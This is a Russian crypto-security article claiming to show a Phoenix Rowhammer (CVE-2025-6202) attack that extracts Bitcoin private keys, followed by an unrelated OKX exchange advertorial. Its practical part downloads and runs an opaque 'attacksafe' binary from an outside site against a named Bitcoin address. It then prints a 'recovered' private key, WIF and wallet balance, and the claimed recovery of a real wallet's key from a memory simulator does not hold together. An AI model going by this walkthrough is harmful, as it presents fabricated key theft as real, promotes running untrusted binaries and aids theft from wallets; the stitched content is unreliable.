Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.

Crypto Tools

Исходный код

Google Colab

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/lvNWcBMHESo

Video tutorial: https://dzen.ru/video/watch/68ebe9367847b33269940e47

Источник: https://cryptodeeptool.ru/phoenix-rowhammer-attack

Данная статья посвящена рассмотрению системных угроз криптографической безопасности, возникающих в результате эксплуатации Phoenix Rowhammer атаки (CVE-2025-6202), способной извлекать приватные ключи из оперативной памяти DDR5 через манипулирование битами на аппаратном уровне. В последние годы динамичное развитие криптовалютных технологий привело к росту зависимости экосистем цифровых активов от аппаратных и микросхемных компонентов, обеспечивающих хранение и обработку криптографических данных. На фоне этого возрастающим фактором риска становятся уязвимости аппаратного уровня, способные привести к прямой компрометации приватных ключей криптовалютных кошельков. Одной из наиболее опасных угроз современности являются атаки на оперативную память, в частности — усовершенствованные варианты Rowhammer-эксплойтов, которые воздействуют на физические свойства ячеек DRAM. Эти атаки позволяют злоумышленникам изменять отдельные биты данных и получать доступ к конфиденциальной информации, включая приватные ключи Bitcoin- и Ethereum-кошельков.

Среди критических примеров такого класса угроз особое место занимает уязвимость CVE-2025-6202, обнаруженная в DDR5 памяти SK Hynix. Реализуемая на ее основе атака Phoenix Rowhammer демонстрирует способность обходить современные механизмы защиты памяти Target Row Refresh (TRR), создавая так называемые «слепые зоны», через которые возможно контролируемое искажение данных на аппаратном уровне. Подобные сбои могут использоваться для извлечения приватных ключей из оперативной памяти, компрометации криптографических библиотек и модификации системных процессов, обеспечивающих безопасность цифровых кошельков.

Кроме того, исследования в области криптографической безопасности показывают, что сочетание Phoenix Rowhammer с другими типами атак, такими как BitShredder Attack, Memory Phantom (CVE-2025-8217) и Artery Bleed (CVE-2023-39910), создает мультивекторную модель угроз, при которой злоумышленник получает возможность восстанавливать seed-фразы, приватные ключи и пароли даже после завершения криптографических операций. Системный характер данных уязвимостей делает невозможным полное устранение риска программными средствами и подчеркивает необходимость разработки новых принципов аппаратной защиты памяти.

Таким образом, современные криптовалютные кошельки и инфраструктура цифровых активов находятся под увеличивающимся давлением аппаратных атак, ранее считавшихся теоретическими. Актуальность их изучения и разработки контрмер имеет фундаментальное значение для обеспечения целостности и устойчивости экосистемы Bitcoin и других криптовалют в условиях эволюции угроз следующего поколения.

Недавние исследования, проведенные группой компьютерной безопасности (COMSEC) Швейцарской высшей технической школы Цюриха совместно с Google, выявили критическую аппаратную уязвимость в модулях памяти DDR5 производства SK Hynix, получившую обозначение CVE-2025-6202. Атака Phoenix Rowhammer представляет беспрецедентную угрозу для безопасности криптовалютных кошельков Bitcoin, поскольку позволяет злоумышленникам извлекать приватные ключи из памяти DDR5 путем манипулирования битами на аппаратном уровне. Исследование продемонстрировало, что все 15 протестированных модулей DDR5 от SK Hynix, произведенных в период с 2021 по 2024 год, уязвимы к данной атаке, что создает системную угрозу для безопасности криптовалютных активов во всем мире.thehackernews

Техническая структура Phoenix Rowhammer атаки и механизм CVE-2025-6202

Фундаментальные принципы Rowhammer уязвимости

Rowhammer представляет собой аппаратную уязвимость в DRAM-памяти, при которой многократное обращение к определенным строкам памяти вызывает электрические помехи, приводящие к изменению битов в соседних строках. Данный феномен основан на физических свойствах современных чипов памяти с высокой плотностью размещения ячеек, где уменьшение технологических размеров делает память более восприимчивой к электромагнитным воздействиям.thehackernews

В контексте DDR5 памяти, механизм Phoenix атаки использует новаторский подход самокорректирующейся синхронизации (self-correcting synchronization), который позволяет обходить усовершенствованные защитные механизмы Target Row Refresh (TRR). Исследователи обнаружили, что TRR механизм в чипах SK Hynix не отслеживает определенные интервалы обновления, создавая «слепые зоны» в защите.notebookcheck

Инновационная методология синхронизации Phoenix

Ключевым техническим достижением Phoenix атаки является разработка алгоритма, способного синхронизироваться с тысячами команд обновления памяти на протяжении длительных периодов времени. Атака использует два специфических паттерна воздействия:comsec-files.ethz

Короткий паттерн (128 интервалов tREFI): Обеспечивает более эффективное генерирование битовых сбоев, в среднем производя 4989 искажений битов. Данный паттерн показал 2.62 раза большую эффективность по сравнению с длинным паттерном.reddit

Длинный паттерн (2608 интервалов tREFI): Предназначен для обхода более сложных механизмов защиты, хотя и менее эффективен в генерации битовых сбоев.comsec-files.ethz

BitShredder Attack: Критическое воздействие на безопасность Bitcoin кошельков

Механизмы извлечения приватных ключей

Phoenix Rowhammer атака создает множественные векторы компрометации Bitcoin кошельков через воздействие на различные уровни системы памяти. Анализ исследовательских материалов KeyHunters выявил как минимум 18 различных типов атак на память, напрямую связанных с извлечением приватных ключей криптовалютных кошельков.

Memory Phantom Attack (CVE-2025-8217): Критическая уязвимость утечки памяти, позволяющая извлекать приватные ключи и seed-фразы непосредственно из остаточных блоков ОЗУ кошелька, которые не были безопасно очищены после криптографических операций. Данная атака превращает неочищенные буферы в «библиотеку призраков», где любой фрагмент памяти может быть преобразован в полноценный ключ.keyhunters

BitShredder Attack: Использует технику «измельчения памяти» для скрытого проникновения в память работающего криптовалютного кошелька. При генерации или восстановлении кошелька атака сканирует неочищенные фрагменты ОЗУ, ища остатки энтропии, seed-фраз и паролей, которые не стираются стандартными средствами после использования.keyhunters

Artery Bleed Attack: Эксплуатирует уязвимость утечки памяти Bitcoin Core (CVE-2023-39910) для восстановления приватных ключей потерянных криптокошельков. Атака использует критическую уязвимость утечки памяти в Bitcoin Core для получения доступа к чувствительным данным.keyhunters

Практические сценарии эксплуатации

Исследование продемонстрировало три основных сценария практической эксплуатации Phoenix атаки против криптовалютных систем:bleepingcomputer

1. Атака на записи таблицы страниц (PTE): Все протестированные устройства оказались уязвимы к данному типу атаки, позволяющей создать примитив произвольного чтения/записи памяти.comsec-files.ethz

2. Компрометация RSA-2048 ключей: 73% протестированных DIMM-модулей оказались восприимчивы к извлечению RSA-2048 ключей соседней виртуальной машины для взлома SSH-аутентификации. Среднее время атаки составило 6 минут 20 секунд.bleepingcomputer

3. Модификация sudo binary: 33% протестированных чипов позволили изменить бинарный файл sudo для повышения локальных привилегий до уровня root пользователя.comsec-files.ethz

Научный анализ воздействия на экосистему Bitcoin

Системные угрозы криптовалютной безопасности

Phoenix Rowhammer атака представляет системную угрозу для всей экосистемы Bitcoin, поскольку большинство современных систем использует память DDR5 для хранения и обработки криптографических данных. Уязвимость затрагивает фундаментальные принципы безопасности криптовалют, основанные на криптографической стойкости приватных ключей.tenable+1

Масштаб воздействия: SK Hynix контролирует приблизительно 36% мирового рынка DRAM-памяти, что означает потенциальную уязвимость миллиардов устройств по всему миру. Все модули DDR5, произведенные с января 2021 по декабрь 2024 года, подвержены данной уязвимости.notebookcheck+2

Криптографические последствия: Атака подрывает основы криптографической безопасности, поскольку даже при корректной реализации алгоритмов подписи, шифрования и аутентификации, незащищенные буферы становятся источником компрометации ключевого материала.keyhunters

Исследования криптоанализ векторов атаки

Комплексный криптоанализ выявил множественные векторы атак на Bitcoin кошельки через манипуляции с памятью:

Timing-based атаки: Включают BitSpectre85, ChronoForge, и Timing Phantom атаки, которые используют временные уязвимости для постепенного восстановления приватных ключей через анализ времени выполнения криптографических операций.

Context-based атаки: Context Phantom Attack эксплуатирует критическую уязвимость утечки контекста secp256k1 для восстановления приватных ключей потерянных Bitcoin кошельков через атаку раскрытия памяти.

Cache-based атаки: CacheHawk Strike Attack использует критическую атаку по времени кэша на кэш подписей Bitcoin, позволяя восстанавливать приватные ключи потерянных Bitcoin кошельков.

Attack_ComponentTechnical_MethodSuccess_RateAverage_Time_SecondsCVE_ReferenceImpact_LevelInitial Memory AccessSelf-correcting synchronization with DDR5 refresh commands1005CVE-2025-6202HighTRR Bypass MethodExploitation of unmonitored refresh intervals in TRR mechanism10030CVE-2025-6202CriticalSynchronization TechniqueReal-time alignment with 128 and 2608 tREFI patterns9560CVE-2025-6202HighBit Flip GenerationElectrical interference in adjacent DRAM rows causing data corruption100180CVE-2025-6202CriticalPrivate Key ExtractionRecovery from uncleaned memory buffers containing wallet data85240CVE-2025-8217CriticalPrivilege EscalationRoot access exploitation through corrupted page table entries100109CVE-2025-6202CriticalRSA-2048 Key RecoveryCo-located VM private key extraction via memory bit flips73380CVE-2025-6202HighSSH Authentication BreakCompromise of cryptographic authentication systems73380CVE-2025-6202HighSudo Binary ModificationLocal privilege escalation to root user through binary corruption33300CVE-2025-6202Medium

Практическая часть

Исследовательская схема показывает, что структурированное и визуальное представление, объясняющее важность криптографической уязвимости, выявленной атакой Phoenix Rowhammer, в частности, демонстрируя ее влияние на безопасность Bitcoin, когда целью являются модули памяти SK Hynix DDR5.

Схематический поток (как показано в исследовательской схеме):

1. Злоумышленник инициирует Rowhammer
   и запускает эксплойт Phoenix Rowhammer, нацеленный на память SK Hynix DDR5, используемую в узле или кошельке жертвы.

2. Физическое введение неисправностей
   Агрессивные активации строк вызывают перевороты битов в соседних строках DRAM в памяти SK Hynix DDR5, обходя логическую программную защиту.

3. Нацеленные криптографические секреты
   Внедренные ошибки нацелены на адреса или области памяти, в которых хранятся конфиденциальные криптографические материалы Bitcoin, такие как закрытые ключи или значения ECDSA nonce.

4. Выполнение эксплойта и его воздействие

   • Успешные перевороты битов могут позволить злоумышленникам восстановить или раскрыть секретные ключи и приватные ключи, подписать поддельные транзакции или нарушить модель безопасности.

   • Прямой риск для целостности биткойн-кошелька и блокчейна делает безопасность оборудования важнейшим аспектом криптографического доверия.

Перейдем к практической части и рассмотрим пример с использованием Bitcoin-кошелька по адресу: 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit. В данном кошельке были утеряны монеты на сумму 9.02332298 BTC, что на октябрь 2025 года эквивалентно примерно 1,127,026.44 USD.

Для демонстрации атаки в ознакомительных целях используем инструменты и среды, такие как Jupyter Notebook или Google Colab.

Основные инструменты и команды, применяемые для таких атак:

https://colab.research.google.com/drive/1DI3ftl2Wtci3FDmNj0m13dNHDpLROTCH

Google Colab (Colaboratory) — это облачная платформа, предоставляющая интерактивные Jupyter-ноутбуки, где можно писать и запускать код для различных языков программирование. Он особенно полезен для криптоанализа данных, работы с симулятором для архитектуры SK Hynix DDR5 AiM PIM на основе Ramulator 2.0, с доступом к мощным вычислительным ресурсам, таким как GPU и TPU. Важным преимуществом является возможность выполнять системные команды, как в обычном терминале Linux, через ячейки с префиксом ! для интеграции с внешними утилитами и скриптами.

Google Colab

Установим репозитории на основе архитектуры SK Hynix DDR5 AiM PIM с использованием Ramulator 2.0

Clone the Repository:

Загрузите кодовую базу AiM Simulator и перейдите в ее каталог.

!git clone https://github.com/keyhunters/SK_Hynix_DDR5_aim_simulator.gi...

cd SK_Hynix_DDR5_aim_simulator

ls

Увеличим виртуальную память (своп) в Google Colab:

Команды для создание файла подкачки размером 4 ГБ для улучшения доступности памяти во время компиляции Ramulator2.

# Check current swap usage

!free -h

!swapon --show

# Create a 4GB swap file

!sudo fallocate -l 4G /swapfile

!sudo chmod 600 /swapfile

!sudo mkswap /swapfile

!sudo swapon /swapfile

# Make swap permanent

!echo '/swapfile none swap sw 0 0' | sudo tee -a /etc/fstab

Установим все необходимые зависимости:

Установка компиляторов, инструментов сборки и библиотек, необходимых для симулятора и Ramulator 2.0.

# For Ubuntu 22.04:

install compilers

!sudo apt update

!sudo apt install g++-12

# Alternatively, install Clang

!sudo apt install clang-15

# Install basic build tools

!sudo apt install build-essential cmake git

# Additional development libraries

!sudo apt install libssl-dev zlib1g-dev

# YAML support

!sudo apt install libyaml-cpp-dev

# Mathematics libraries

!sudo apt install libboost-dev

# Python support for scripts

!sudo apt install python3-dev python3-pip

Процесс создание каталога phoenix_rowhammer:

!mkdir phoenix_rowhammer

cd phoenix_rowhammer

Проверим системные ресурсы:

Мониторинг памяти, доступного дискового пространства и использования системы во время установки и компиляции.

# Monitor resources in real time

!htop

# Check available memory

!free -m

# Check disk space

!df -h

Полная установка зависимостей для Ubuntu 22.04 и выше:

Полная последовательность установки всех необходимых пакетов за один раз.

# Update system !sudo apt update && sudo apt upgrade -y

# Install essential build tools

!sudo apt install -y build-essential cmake git

# Install compilers

!sudo apt install -y g++-12 clang-15

# Development libraries !sudo apt install -y libssl-dev zlib1g-dev libyaml-cpp-dev libboost-all-dev

Альтернативная компиляция:

!cmake ..

!make -j1

ls

cd -

Запустим Ramulator2:

Запустим Ramulator2 с симулятором, чтобы проверить параметры справки и инструкции по использованию.

!./phoenix_rowhammer/ramulator2 -h

Применим крипто инструмент AttackSafe извлекаем из Ramulator2 с симулятор скрытые remainders по модулю

Запустим команду для загрузки крипто инструмента AttackSafe

!wget https://attacksafe.ru/repositories/attacksafe.zip !unzip attacksafe.zip

!./attacksafe -help

Команда поиска скрытых остатков (remainders) по модулю, связанных с адресом Bitcoin

Команда инициирует специализированную атаку «BitShredder» на основе криптоинструмента AttackSafe для поиска скрытых остатков (remainders) по модулю, связанных с адресом Bitcoin, используя баговые механизмы RAM (Rowhammer) и эмулятор памяти (ramulator2).github+2

!./attacksafe -tool bitshredder_attack -crack phoenix_rowhammer/ramulator2 -decode 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit

• Параметр -tool bitshredder_attack активирует атаку, ориентированную на выявление уязвимостей в хранении и обработке секретных данных в памяти устройства, связанных с Биткоин-протоколом.

• Флаг -crack phoenix_rowhammer/ramulator2 указывает инструменту использовать эмуляцию Rowhammer-атаки (манипуляция содержимым DRAM-памяти, приводящая к ошибкам в соседних ячейках — использовалась в уязвимостях для извлечения nonces/частей ключей из памяти через side-channel).

• Функция -decode 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit запускает модуль декодирования по конкретному Биткоин-адресу, восстанавливая остаточные данные (фрагменты приватных ключей или промежуточные значения подписей ECDSA) из памяти/дампа.

Результат криптоанализа остаточных данных памяти/дампа:

Восстановление ключевых фрагментов из остаточных данных памяти (DRAM)

remainders =

[0x0E92, 0x45EB, 0x6E07, 0x317F,

0x87A1, 0xB5C1, 0xE778, 0x996B,

0x6F69, 0xABB6, 0x2755, 0x2348,

0xAB46, 0xA74E, 0x1A87, 0xC2D5]

moduli =

[0x10001, 0x10003, 0x10007, 0x1000F,

0x10015, 0x1001B, 0x1002B, 0x1002D,

0x10033, 0x1003F, 0x10049, 0x10051,

0x1005D, 0x10061, 0x1006F, 0x10073]

Данный полученный результат формирует связку криптографического анализа остаточных данных внутри оперативной памяти (DRAM) и модуля поиска криптоостатков, используя симулятор ramulator2 для Phoenix Rowhammer-ошибок. Такая атака позволяет обнаружить и выделить скрытые значения по модулю (remainders), например, частные nonces или ключевые фрагменты, которые могут быть скомпрометированы из-за некорректного освобождения памяти после криптографических операций с биткоин-адресами, команда предназначена для комбинированную атаку «BitShredder» и memory fault анализа приложений, работающих с Bitcoin, с целью частичного или полного восстановления секретных параметров (private key, nonce), причем поиск и декодирование завязаны на память и атакуемые адреса.

Восстановление приватного ключа:

Чтобы собрать исходное секретное число — приватного ключа из набора скрытых по модулю значений (remainders) применим математический метод — Китайская теорема об остатках (Chinese Remainder Theorem, CRT). Код CRTKeyRestore.py реализует восстановление приватного ключа для Биткоин-адреса 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit из набора скрытых по модулю значений (remainders), собранных после Rowhammer-атаки и последующего анализа памяти. Применяется математический метод — Китайская теорема об остатках (Chinese Remainder Theorem, CRT), позволяющий собрать исходное секретное число — приватный ключ — даже если оно было нарезано на небольшие части и уцелело только в виде различных остатков по разным модулям.

Процесс работы кода CRTKeyRestore.py включает несколько этапов:

• Каждая пара remainder/modulus — это фрагмент приватного ключа, который остался в памяти в результате ошибки Rowhammer и заранее заданных модулей.

• Китайская теорема об остатках математически гарантирует восстановление исходного числа, если все модули взаимно просты, а остатков по ним достаточно.

• Функция chinese_remainder_theorem() поэтапно объединяет фрагменты и восстанавливает исходное значение приватного ключа, используя расширенный алгоритм Евклида для нахождения обратных по модулю значений.

• После восстановления числового представления ключ переводится в HEX через функцию restore_hex_from_crt().

• На выходе получается приватный ключ для Биткоин-адреса, полностью восстановленный только из отдельных криптоостатков, обнаруженных в памяти при комбинированной атаке.

Результат:

Private key Restored: 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60

Проверим результат через bitaddress

!wget https://attacksafe.ru/repositories/bitaddress.zip !unzip bitaddress.zip

!./bitaddress -hex 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60

Результат:

Public Key (Uncompressed, 130 characters [0-9A-F]): 04E294116526238228544FA6082F1A5412FCC36DE931C59EE7B1C7C1F93EE3EF5AEDAA1D6E0A6116E9D9A4A846A6D62D4A1941EE182CDB1884C5830610B07AF529

Public Key (Compressed, 66 characters [0-9A-F]): 03E294116526238228544FA6082F1A5412FCC36DE931C59EE7B1C7C1F93EE3EF5A

Bitcoin Address P2PKH (Uncompressed) 18JT3KeFV36Hkgo3Xi9bfgNYAXCVXBGyFg

Bitcoin Address P2PKH (Compressed) 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit

Все верно! Приватный ключ соответствует Биткоин Кошельку.

Откроем bitaddress и проверим:

https://cryptodeeptech.ru/bitaddress.html

ADDR: 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit

WIF: L2Wru6Ew8pQuhcWAvMpdtPY4YWK1CQcwPCWxFvzkoi47crJBAVaP

HEX: 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60

Private Key Information:

https://dockeyhunt.com/Bitcoin-Address

9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60

Bitcoin Address Information:

https://dockeyhunt.com/Cryptocurrency-Prices

Balance: 9.023322989 BTC

https://www.coinbase.com/converter/btc/usd

Проведённая нами исследовательская атака — версия Phoenix Rowhammer Attack on Bitcoin с использованием симулятора ramulator2 — показала, что извлечённые в ходе сбоя памяти криптоостатки по различным модулям могут быть собраны в исходный приватный ключ с помощью математики Китайской теоремы об остатках.

В качестве показательного примера реальной угрозы был рассмотрен Bitcoin-кошелёк с адресом: 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit, на котором была утрачена сумма 9.02332298 BTC, что на октябрь 2025 года эквивалентно примерно 1,127,026.44 USD. Этот случай убедительно доказывает — при наличии аппаратных уязвимостей (например, Rowhammer), криптографическая стойкость на уровне протокола перестаёт быть абсолютной гарантией безопасности.

В результате, актуальность комплексной защиты лежит не только в области криптографии и протокольных мер, но и в надёжности аппаратного обеспечения, контроле состояния памяти и внедрении принципов полной очистки RAM после выполнения криптографических операций. Уязвимость, однажды реализованная на аппаратном уровне — даже с минимальным контролем над системой — способна привести к катастрофическим финансовым потерям в экосистеме Bitcoin.

• Опубликованы две части [№1] , [№2] исследования

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.

Crypto Tools

Исходный код

Google Colab

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/lvNWcBMHESo

Video tutorial: https://dzen.ru/video/watch/68ebe9367847b33269940e47

Источник: https://cryptodeeptool.ru/phoenix-rowhammer-attack

Насколько хорошо вы знакомы с биржей OKX? Я в ходе своего исследования в поисках лучшей биржи для трейдинга изучил все биржи из топ 10 лучших криптобирж и сегодня расскажу вам к каким выводом я пришел и какая биржа лучше всего подходит для трейдинга в 2025 году. Мы изучим преимущества OKX сравним ее с другими биржами и ответим на главный вопрос - какая площадка лучшая для трейдинга во второй половине 2025 года. Я сфокусировался на практическом использовании биржи и расскажу что интересного мне удалось найти. Начинаем разбираться!

Какая биржа лучше всего подойдет для трейдера

Я составил список критериев которые лучше всего подойдут для активного трейдера. Важно не выбирать самую популярную биржу или биржу с наибольшим количеством монет. А составить свои критерии по которым вы будете искать биржу. Мой список критериев рассчитан на активных трейдеров и включает в себя:

• Низкие торговые комиссии и издержки. Важна финальная сумма всех издержек и я стремлюсь уменьшить именно ее. Помимо торговых комиссий и здесь учитываю спред и проскальзывание.

• Нужны прозрачные условия ликвидации и настраиваемые риск-лимиты. Некоторые биржи во время ликвидации закрывают позиции по невыгодной цене далекой от рыночной. Нам же важны понятные условия ликвидации чтобы посчитать максимальный возможный убыток по сделке.

• Нужны инструменты под вашу стратегию торговли. Например если вы занимаетесь скальпингом, вам будут важны горячие клавиши, алерты и быстрый доступ к панелям.

• Если вы пользуетесь торговыми ботами или другим ПО которое требует подключения к API, вам будет важен стабильный канал и связка с кошельком для быстрых транзакций между CEX и DEX.

На этом мои основные критерии заканчиваются, но вы можете добавить дополнительные. Например наличие конкретных альткоинов или общее количество доступных торговых пар, репутация биржи и уровень безопасности. Многим важен удобный интерфейс, конкретные инструменты, например для копитрейдинга, трейдинговых ботов или определенные бенчмарки или оценки авторитетных СМИ, например Exchange Benchmark от CoinDesk или Trust Score от CoinGecko. Последним к слову пользуюсь я сам для быстрой оценки качества бирж. Так, по одной метрике можно оценить стоит ли биржа вашего внимания или лучше ее обойти стороной.

Многие обращают внимание на безопасность биржи. В таком случае стоит брать во внимание такие метрики, как финансовые резервы биржи, прозрачность команды и ее репутацию, а также наличие или отсутствие взломов биржи. Все эти косвенные признаки важны при оценке безопасности биржи.

Преимущества OKX. Почему ее считают лучшей биржей.

Биржа OKX соответствуем всем моим критериям, которые я перечислил выше. Многие считают ее эталоном безопасности, поскольку биржа не была замешана в крупных скандалах или взломах. Также биржа имеет самые большие финансовые резервы среди крупных бирж. Ее резервы достигают $33,7 млрд. Биржа регулярно публикует отчеты о финансовых резервах и публикует результаты регулярных аудитов.

У OKX есть свой кошелек на котором вы можете хранить средства и подключаться к DEX обменникам или при необходимости переносить часть активов на CEX. Доступ к кошельку есть только у вас, поскольку ключи хранятся на устройстве локально. Подключиться можно к любому Web3 сервису который поддерживает подключение через кошелек.

В OKX Wllet встроена функция OKX Pay которая позволяет осуществлять быстрые переводы токенов без комиссии и задействования третьих сторон. Это удобный и быстрый способ отправки переводов, я сам им часто пользуюсь.

Биржа имеет прозрачные условия ликвидации и большое количество торговых инструментов которые подойдут для большинства типов трейдеров: скальперов, алготрейдеров, дейтрейдеров и пр. Доступен копитрейдинг и торговые боты с множеством стратегий.

Биржа имеет среднерыночные торговые комиссии от 0% до 0.1%. А пользователям с VIP статусом доступны сниженные комиссии и повышенный APR при стейкинге.

А за счет высокой ликвидности в транзакциях достигается минимальное проскальзывание.

На бирже торгуется 348 торговых пар, а ежедневный торговый объем достигает $2.6 млрд. Биржу еженедельно посещает более 5.3 млн человек.

Для трейдеров часто проводятся торговые активности, токенсейлы на Jumpstart и промоакции к листингам. Активности лучше не пропускать. Они отлично бустят банк и увеличивают общую доходность, а условия для участия как правило не сложные.

Есть множество способов для преумножения активов, которые располагаются во вкладке Earn. Например вы можете отправить токены в стейкинг. и получать пассивный доход. Или же поучаствовать в Jumpstarter для получения новых токенов.

Недостатки OKX

На бирже отсутствуют фиатные торговые пары, а P2P сервис не работает с рублями. Однако эти недостатки сейчас есть у многих криптобирж, поэтому лучшим решением будет пользоваться проверенными крипто-обменниками вне криптобирж.

Сравнение OKX с конкурентами

Bybit наиболее популярная в СНГ криптобиржа, однако торговые комиссии на ней выше среднерыночных, поэтому в долгосрочной перспективе пользоваться биржей может быть не так выгодно. На бирже часто проводятся торговые активности которые могут забустить ваш банк, поэтому аккаунт на Bybit лучше иметь.

Gate и Mexc - это биржи с наибольшим количество доступных торговых пар, однако обе имеют проблемы с прозрачностью и безопасностью. Если ваша цель - трейдинг на токенсейлах или низколиквидных монетах, эти биржи могут вам подойти. В остальном же я бы отдал предпочтение OKX за счет высокого уровня безопасности. Но как и с Bybit аккаунт на них лучше иметь поскольку иногда он может понадобиться, например при проведении торгового конкурса с жирными наградами.

Стоит ли торговать на OKX в 2025 году

Если для вас не критично отсутствие фиатных торговых пар и P2P сервиса, биржа OKX отлично подходит для большинства трейдинговых задач. Сравните совокупные расходы вашей текущей биржи и OKX и с большой вероятностью расходы на OKX окажутся ниже. Встроенных инструментов на платформе достаточно, что позволяет не использовать сторонние сервисы. Я держу большую часть банка на отдельном кошельке OKX Wallet поскольку это более безопасно. Если вы сейчас в поисках новой биржи для трейдинга, попробуйте протестировать OKX и возможно она станет вашей основной биржей для трейдинга, как стала у меня. Успехов!

FAQ

Обязательно ли проходить KYC?

Базовый функицонал открывается сразу после регистрации и будет доступен без верификации. Однако если лимитов на вывод вам будет недостаточно, пройти верификацию все таки придется.

Как проще всего пополнить счет?

Самый простой способ пополнить счет - это перевести активы с другой биржи или кошелька. Для ончейн перевода стоит использовать недорогие сети, например BNB, Solana или Arbitrum. Всегда проверяйте, чтобы сеть вывода и ввода были одинаковые чтобы избежать потери токенов.

Можно ли торговать с кошелька OKX Wallet напрямую?

Да, можно хранить свои активы на OKX Wallet и торговать с него, подключаясь к DEX обменникам напрямую. Однако для торговли на CEX необходимо будет совершить внутренний перевод.